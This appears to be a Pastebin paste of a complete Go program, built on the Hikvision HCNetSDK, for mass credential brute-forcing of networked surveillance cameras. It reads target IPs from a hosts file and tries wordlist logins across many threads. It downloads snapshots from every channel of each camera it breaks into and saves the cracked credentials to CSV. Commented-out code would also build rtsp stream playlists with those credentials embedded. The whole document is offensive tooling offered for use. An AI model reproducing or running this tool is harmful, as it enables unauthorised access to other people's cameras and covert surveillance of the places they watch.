API tools faq
paste
Guest User

Untitled

a guest
Sep 4th, 2015
420
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.11 KB | None | 0 0
raw download clone embed print report
  1. package main
  2.  
  3. /*
  4. #include "HCNetSDK.h"
  5. */
  6. import "C"
  7. import (
  8. "strconv"
  9. "fmt"
  10. "unsafe"
  11. "sync"
  12. "net"
  13. "os"
  14. "bufio"
  15. "flag"
  16. "encoding/binary"
  17. "time"
  18. "encoding/csv"
  19. // "encoding/json"
  20. "fatih"
  21. )
  22.  
  23. var threads int
  24. var port uint16
  25. var ping bool
  26. var logins_file string
  27. var passwords_file string
  28. var shoots_path string
  29. var json_file string
  30. var csv_file string
  31. var m3u_file string
  32.  
  33. var logins []string
  34. var passwords []string
  35.  
  36. var err *color.Color
  37. var info *color.Color
  38. var warn *color.Color
  39. var succ *color.Color
  40.  
  41. type CameraAddress struct {
  42. IP string `json:"ip"`
  43. Port uint16 `json:"port"`
  44. }
  45.  
  46. type DeviceInfo struct {
  47. Login string `json:"user"`
  48. Password string `json:"password"`
  49. StartChannel uint8 `json:"start_channel"`
  50. ChannelsCount uint8 `json:"channels"`
  51. Address CameraAddress `json:"address"`
  52. }
  53.  
  54. // type JsonResult struct {
  55. // Authorized []DeviceInfo `json:"authorized"`
  56. // Unauthorized []CameraAddress `json:"unauthorized"`
  57. // }
  58.  
  59. func HPRPing(ip string) bool {
  60. request := []byte {
  61. 0x00, 0x00, 0x00, 0x20, 0x63, 0x00, 0x00, 0x00,
  62. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  63. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  64. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  65. }
  66.  
  67. var response [16]byte
  68.  
  69. conn, err := net.DialTimeout("tcp", ip + ":" + strconv.Itoa(int(port)), 3 * time.Second)
  70. if (err != nil) {
  71. return false
  72. }
  73. defer conn.Close()
  74.  
  75. conn.SetDeadline(time.Now().Add(5*time.Second))
  76.  
  77. err = binary.Write(conn, binary.LittleEndian, request)
  78. if (err != nil) {
  79. return false
  80. }
  81.  
  82. err = binary.Read(conn, binary.LittleEndian, &response)
  83. if (err != nil) {
  84. return false
  85. }
  86.  
  87. return ((response[3] == 0x10) && (response[7] == response[11]))
  88. }
  89.  
  90. func grabShoots(ip string, uid int64, startChannel int, count int, login string, password string) {
  91. if (count == 0) {
  92. warn.Println("No cameras on", ip)
  93.  
  94. return
  95. }
  96.  
  97.  
  98. downloaded := 0
  99.  
  100. for i := startChannel; i < startChannel + count; i++ {
  101. filename := fmt.Sprintf("%s%s_%s_%s_%d.jpg", shoots_path, login, password, ip, i)
  102.  
  103. var imgParams C.NET_DVR_JPEGPARA
  104. imgParams.wPicQuality = 0
  105. imgParams.wPicSize = 0
  106.  
  107. result := C.NET_DVR_CaptureJPEGPicture(
  108. (C.LONG)(uid),
  109. (C.LONG)(i),
  110. (*C.NET_DVR_JPEGPARA)(unsafe.Pointer(&imgParams)),
  111. C.CString(filename),
  112. )
  113.  
  114. if (result == 0) {
  115. err.Println("Error while downloading a snapshot from", ip, ":", (int)(C.NET_DVR_GetLastError()))
  116. } else {
  117. os.Chmod(filename, 0644)
  118. downloaded++
  119. }
  120. }
  121.  
  122.  
  123. if (downloaded != 0) {
  124. info.Println("Downloaded", downloaded, "photos from", ip)
  125. } else {
  126. warn.Println("Can't get photos from", ip)
  127. }
  128. }
  129.  
  130. func bruteforce(ip string, results chan DeviceInfo) {
  131. if (ping) {
  132. if (!HPRPing(ip)) {
  133. err.Println(ip, "is dead")
  134.  
  135. return
  136. }
  137. }
  138.  
  139.  
  140. for _, login := range logins {
  141. for _, password := range passwords {
  142. var device C.NET_DVR_DEVICEINFO
  143.  
  144. uid := (int64)(C.NET_DVR_Login(
  145. C.CString(ip),
  146. C.WORD(port),
  147. C.CString(login),
  148. C.CString(password),
  149. (*C.NET_DVR_DEVICEINFO)(unsafe.Pointer(&device)),
  150. ))
  151.  
  152. if (uid >= 0) {
  153. succ.Printf("Logged in: %s:%s@%s\n", login, password, ip)
  154.  
  155. if (shoots_path != "") {
  156. //
  157. // Grabbing a photos
  158. //
  159.  
  160. // I'm not really sure about all this logic.
  161.  
  162. var ipcfg C.NET_DVR_IPPARACFG
  163. var written int32
  164.  
  165. if (C.NET_DVR_GetDVRConfig(
  166. (C.LONG)(uid),
  167. C.NET_DVR_GET_IPPARACFG,
  168. 0,
  169. (C.LPVOID)(unsafe.Pointer(&ipcfg)),
  170. (C.DWORD)(unsafe.Sizeof(ipcfg)),
  171. (*C.uint32_t)(unsafe.Pointer(&written)),
  172. ) >= 0) {
  173. var count C.BYTE = 0
  174. for i := 0; i < C.MAX_IP_CHANNEL && ipcfg.struIPChanInfo[i].byEnable == 1; i++ {
  175. count++
  176. }
  177.  
  178. if (count > 0) {
  179. device.byChanNum = count
  180. device.byStartChan += 32
  181. }
  182. }
  183.  
  184. grabShoots(
  185. ip,
  186. uid,
  187. (int)(device.byStartChan),
  188. (int)(device.byChanNum),
  189. login,
  190. password,
  191. )
  192. }
  193.  
  194. results <- DeviceInfo{
  195. login,
  196. password,
  197. (uint8)(device.byStartChan),
  198. (uint8)(device.byChanNum),
  199. CameraAddress{ip, port},
  200. }
  201.  
  202. C.NET_DVR_Logout((C.LONG)(uid))
  203.  
  204. return
  205. }
  206. }
  207. }
  208.  
  209.  
  210. warn.Println("Can't log into", ip)
  211. results <- DeviceInfo{Address: CameraAddress{ip, port}}
  212. }
  213.  
  214.  
  215. func readLines(path string) ([]string, error) {
  216. file, err := os.Open(path)
  217. if err != nil {
  218. return nil, err
  219. }
  220. defer file.Close()
  221.  
  222. var lines []string
  223. scanner := bufio.NewScanner(file)
  224. for scanner.Scan() {
  225. lines = append(lines, scanner.Text())
  226. }
  227. return lines, scanner.Err()
  228. }
  229.  
  230. func dumpAuthCSV(file *os.File, devices *[]DeviceInfo) {
  231. writer := csv.NewWriter(file)
  232. for _, cam := range *devices {
  233. writer.Write([]string{
  234. cam.Address.IP,
  235. strconv.Itoa((int)(cam.Address.Port)),
  236. cam.Login,
  237. cam.Password,
  238. })
  239. }
  240.  
  241. writer.Flush()
  242. err := writer.Error()
  243. if (err != nil) {
  244. panic(err)
  245. }
  246.  
  247. *devices = nil
  248. }
  249.  
  250. func dumpGoodCSV(file *os.File, devices *[]CameraAddress) {
  251. writer := csv.NewWriter(file)
  252. for _, addr := range *devices {
  253. writer.Write([]string{
  254. addr.IP,
  255. strconv.Itoa((int)(addr.Port)),
  256. })
  257. }
  258.  
  259. writer.Flush()
  260. err := writer.Error()
  261. if (err != nil) {
  262. panic(err)
  263. }
  264.  
  265. *devices = nil
  266. }
  267.  
  268. func parseFlags() {
  269. flag.IntVar(&threads, "threads", 1, "Threads count")
  270. port = (uint16)(*flag.Int("port", 8000, "Camera service port"))
  271. flag.BoolVar(&ping, "check", false, "Check cameras (experimental and not fully tested, but very useful)")
  272. flag.StringVar(&logins_file, "logins", "logins", "A file with a list of logins to bruteforce")
  273. flag.StringVar(&passwords_file, "passwords", "passwords", "A file with a list of passwords to bruteforce")
  274. flag.StringVar(&shoots_path, "shoots", "", "Download pics from cameras into a folder")
  275. flag.StringVar(&csv_file, "csv", "", "Write result to CSV")
  276. flag.StringVar(&json_file, "json", "", "Write result to JSON")
  277. flag.StringVar(&m3u_file, "m3u", "", "Write result to m3u playlist")
  278. flag.Parse()
  279. }
  280.  
  281. func initialize() {
  282. // No shadowing pls
  283. var err error
  284.  
  285. logins, err = readLines(logins_file)
  286. if (err != nil) {
  287. fmt.Println(err)
  288.  
  289. return
  290. }
  291. fmt.Println("Loaded", len(logins), "logins")
  292.  
  293. passwords, err = readLines(passwords_file)
  294. if (err != nil) {
  295. fmt.Println(err)
  296.  
  297. return
  298. }
  299. fmt.Println("Loaded", len(passwords), "passwords")
  300.  
  301.  
  302. // Creating a directory for pics
  303. if (shoots_path != "") {
  304. if (string(shoots_path[len(shoots_path) - 1]) != string(os.PathSeparator)) {
  305. shoots_path += string(os.PathSeparator)
  306. }
  307.  
  308. err = os.MkdirAll(shoots_path, 0777)
  309. if (err != nil) {
  310. fmt.Println(err)
  311.  
  312. return
  313. }
  314. }
  315.  
  316.  
  317. fmt.Println("Starting work in", threads, "threads")
  318. fmt.Println()
  319. }
  320.  
  321. func start() {
  322. // Results are stored here
  323. var authorized []DeviceInfo
  324. var unauthorized []CameraAddress
  325.  
  326.  
  327. // no shadowing pls
  328. var err error
  329.  
  330.  
  331. // Creating a CSV file for results
  332. var csv *os.File
  333. if (csv_file != "") {
  334. csv, err = os.Create(csv_file)
  335. if (err != nil) {
  336. panic(err)
  337. }
  338. defer csv.Close()
  339. }
  340. defer dumpAuthCSV(csv, &authorized)
  341. defer dumpGoodCSV(csv, &unauthorized)
  342.  
  343.  
  344. // Catching results here.
  345. // Is this a good practice to send a structure with empty fields?
  346. // Maybe I should make it with two channels.
  347. results := make(chan DeviceInfo)
  348. defer close(results)
  349.  
  350. go func() {
  351. for li := range results {
  352. if (csv_file != "") {
  353. if (li.Login != "") {
  354. authorized = append(authorized, li)
  355.  
  356. if (len(authorized) >= 10) {
  357. dumpAuthCSV(csv, &authorized)
  358. }
  359. } else {
  360. unauthorized = append(unauthorized, li.Address)
  361.  
  362. if (len(unauthorized) >= 10) {
  363. dumpGoodCSV(csv, &unauthorized)
  364. }
  365. }
  366. }
  367. }
  368. }()
  369.  
  370.  
  371. // Spawning main bruteforce coroutines
  372. ipCh := make(chan string)
  373. bg := new(sync.WaitGroup)
  374.  
  375. for i := 0; i < threads; i++ {
  376. bg.Add(1)
  377. go func() {
  378. defer bg.Done()
  379. for ip := range ipCh {
  380. bruteforce(ip, results)
  381. }
  382. }()
  383. }
  384.  
  385.  
  386. // Sending IPs to bruteforce coroutines
  387. inFile, err := os.Open("hosts")
  388. if (err != nil) {
  389. panic(err)
  390. }
  391. defer inFile.Close()
  392.  
  393. scanner := bufio.NewScanner(inFile)
  394. scanner.Split(bufio.ScanLines)
  395. for scanner.Scan() {
  396. ipCh <- scanner.Text()
  397. }
  398. close(ipCh)
  399.  
  400.  
  401. bg.Wait()
  402. }
  403.  
  404. func main() {
  405. C.NET_DVR_Init()
  406. defer C.NET_DVR_Cleanup()
  407.  
  408. // No such function in windows lib
  409. // C.NET_DVR_SetRecvTimeOut(3000);
  410.  
  411. parseFlags()
  412.  
  413. err = color.New(color.FgRed, color.Bold)
  414. info = color.New(color.FgBlue, color.Bold)
  415. warn = color.New(color.FgYellow, color.Bold)
  416. succ = color.New(color.FgGreen, color.Bold)
  417.  
  418.  
  419. initialize()
  420.  
  421. start()
  422.  
  423.  
  424. // if (json_file != "") {
  425. // color.New(color.FgBlue, color.Bold).Println("Writing JSON to", json_file)
  426.  
  427. // j, err := json.MarshalIndent(
  428. // JsonResult{
  429. // Authorized: authorized,
  430. // Unauthorized: unauthorized,
  431. // },
  432. // "",
  433. // " ",
  434. // )
  435. // if (err != nil) {
  436. // panic(err)
  437. // }
  438.  
  439. // f, err := os.Create(json_file)
  440. // if (err != nil) {
  441. // panic(err)
  442. // }
  443.  
  444. // defer f.Close()
  445.  
  446. // f.WriteString(string(j))
  447. // }
  448.  
  449. // if (m3u_file != "") {
  450. // color.New(color.FgBlue, color.Bold).Println("Writing m3u playlist to", m3u_file)
  451.  
  452. // f, err := os.Create(m3u_file)
  453. // if (err != nil) {
  454. // panic(err)
  455. // }
  456. // defer f.Close()
  457.  
  458. // writer := bufio.NewWriter(f)
  459. // writer.WriteString("#EXTM3U\n")
  460.  
  461. // for index, cam := range authorized {
  462. // for channel := cam.StartChannel; channel < cam.StartChannel + cam.ChannelsCount; channel++ {
  463. // writer.WriteString(
  464. // fmt.Sprintf(
  465. // "#EXTINF:1,%d_%d\n",
  466. // index,
  467. // channel - cam.StartChannel + 1,
  468. // ),
  469. // )
  470.  
  471. // writer.WriteString(
  472. // fmt.Sprintf(
  473. // "rtsp://%s:%s@%s/mpeg4/ch%02d/main/av_stream",
  474. // cam.Login,
  475. // cam.Password,
  476. // cam.Address.IP,
  477. // channel,
  478. // ),
  479. // )
  480. // }
  481. // }
  482.  
  483. // writer.Flush()
  484. // }
  485. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!